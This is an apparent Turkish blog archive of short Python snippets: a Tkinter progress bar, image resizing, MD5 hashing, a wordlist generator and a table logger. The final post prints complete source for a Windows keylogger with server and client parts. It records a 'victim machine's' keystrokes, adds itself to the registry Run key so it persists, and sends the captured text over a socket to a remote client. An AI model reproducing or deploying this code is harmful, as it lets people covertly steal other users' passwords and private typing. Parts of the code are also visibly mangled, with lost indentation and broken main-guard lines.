Arşiv

Archive for the ‘Kodlar’ Category

Python ile Tkinter ProgressBar

10/05/2013 Yorum bırakın

# Tkinter progress bar experiment
# using label and string of spaces

import Tkinter as tk

root = tk.Tk()
# width 300 and height 100, no offsets
root.geometry("300x100+0+0")
space = " "
s = ""
label = tk.Label(root, text=s, bg=’blue’)
label.pack(anchor=’nw’)

for k in range(80):
s += space
# increments every 100 milliseconds
label.after(100,label.config(text=s))
label.update() # needed

root.mainloop()

Kaynak: Daniweb

Reklamlar

Python ile Resim Boyutlandırma

10/05/2013 Yorum bırakın

Python ile kodlanmış küçük bir programcık :)

Seçtiğiniz herhangi bir resmi boyutlandırarak "YeniResim.jpg" olarak kaydediyor.

Siz bunu istedğiniz şekilde düzenleyebilirsiniz...

Daha fazlasını oku...

Python ile sohbet botu

07/03/2013 Yorum bırakın

Çok basit ama, Pythonla ilgilenen arkadaşların kodları inceleyebilmelerine olanak sağladım. Bu sayede ilgileri artar herhalde

Python Kodu:

Daha fazlasını oku…

Kategoriler:Kodlar Etiketler:, , , ,

Python ile wordlist oluşturmak

07/03/2013 Yorum bırakın

Python ile kodlanmış olan wordlist oluşturan ilgilenenler için güzel bir örnek oluşturacak basit bir script

 
Kodlar:
Daha fazlasını oku...

Kategoriler:Kodlar Etiketler:, ,

Python ile MD5’e çevirmek

27/11/2012 1 yorum

Arkadaşlar python ile herhangi bir metni md5 e dönüştürmek için yazmamız gereken kısa kod aşağıdaki gibidir
Daha fazlasını oku...

Kategoriler:Kodlar Etiketler:, , , , ,

Python kutula fonksiyonu

27/11/2012 1 yorum

class ToFile:
def __init__(self):
self.table=""
self.filenum=1
self.words=["Zaman","Devir","Volt","Akim","Sicaklik","Diger","Diger","Diger","Diger","Diger"]
def now(self):
return time.strftime("%d/%m/%y %T")

def packVeri(self,veri):
if veri:
self.veri=veri
else: return
ls=os.listdir('logs/')
if len(ls)==0:
self.logfile=open('logs/'+str(self.filenum)+'.log','w')
self.boxTable()
else:
self.logfile=open('logs/'+str(self.filenum)+'.log','a')
self.continueTable()
#self.logfile=open(sorted(ls[:-1]),'w')
#if os.path.exist(sorted(ls[:-1]):

def boxTable(self):
words=self.words
length=[]
for each in range(len(words)):
length.append(len(words[each]))
n=sorted(length)[-1]+2
self.table+=("+"+n*"-"+"+")+((len(words)-1)*("+"+n*"-"+"+"))+"\n"
for word in words:
if len(word)+2==n:
self.table+="| "+word+" |"
else:
self.table+="| "+word+(n-len(word)-2)*" "+" |"
self.table+=("\n+"+n*"-"+"+")+((len(words)-1)*("+"+n*"-"+"+"))+"\n"
self.logfile.write(self.table)
self.table=""
self.continueTable()

def continueTable(self):
words=self.words
values=[self.now()]
values.extend(self.veri)
length=[]
for each in range(len(words)):
length.append(len(words[each]))
n=sorted(length)[-1]+2
self.logfile.seek(0,2)
for value in values:
if len(value)+2==n:
self.table+="| "+value+" |"
else:
self.table+="| "+value+(n-len(value)-2)*" "+" |"
self.table+=("\n+"+n*"-"+"+")+((len(words)-1)*("+"+n*"-"+"+"))+"\n"
self.logfile.write(self.table)
self.logfile.close()

----------------------------------------------------------------------------------

veri dediği python liste tipinde gelmesi gereken veridir,

+--------+
| cnr      |
+--------+
| cnr437  |
+--------+

gibi çıktıları dosya içine kaydedebiliyo, python kullanıp da log tutmak isteyenlerin işine yarayabilir,

Kategoriler:Kodlar Etiketler:, ,

Python ile keyloger örneği

27/11/2012 Yorum bırakın

"""
Server Version
*KeyLogger.pyw
*Log all key strokes from victim machine
Features:
-Text File Transfer
-Version 1.2
"""
import os
import string
import sys
import win32api
import socket
from _winreg import *
def body():
      try:
         socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
         socket1.bind((socket.gethostname(), 902))
         socket1.listen(5) 
         conn, addr = socket1.accept()
      except socket.error:
         print "error with sockets"
      else:  
        try:
           keylog_file = open("C:\\keylog_file.txt","w")
        except IOError:
           print "Error grabbing file"
        else:
         while 1:
            keyAscii = 0
            for i in range(32, 256):
                key_log = win32api.GetAsyncKeyState(i)
                if key_log == -32767:
                  print i
                  key_end = 81
                  keylog_file.write(chr(i))
                  if i == key_end:
                     keylog_file.close()
                     keyin = open("C:\\keylog_file.txt","r")
                     data = keyin.read()
                     conn.send(data)
def regwrite():
   aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
   aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") 
   aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
   SetValueEx(aKey,"AciD Ice",0, REG_SZ, r"C:\your_project_name_here.pyw")
   CloseKey(aKey)
   CloseKey(aReg)
if     ==  '':
       class mainexecution:
         regwrite()
         body()

"""
Client Version
*Client.py
*Log all key strokes from victim machine
Features:
-Text File Transfer
-Help
-About
-Version 1.2
"""
import socket 
import os
def body():
      print "AciD Ice Client V-1.1"
      victim_IP = raw_input ("please input an IP to connect to ") 
      host = victim_IP 
      port = 902
      addr = (victim_IP, 902)
      try:
        socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket1.connect(addr)
      except socket.error:   
        print "failure to connect"
      else:
        print "connection Made to remote host =]"
        try:
          file = open("C:\\key_log_file2.txt","w")
        except IOError:
          print "error in file"
        else:
          logging()  
          data = socket1.recv(1024)
          print data 
          file.write(data)
          file.close()
def logging():
    print "Logging keys..."
    print "------------------------------"
if     ==  '':
    class mainprog:  
       body()

Kaynak: Rohitab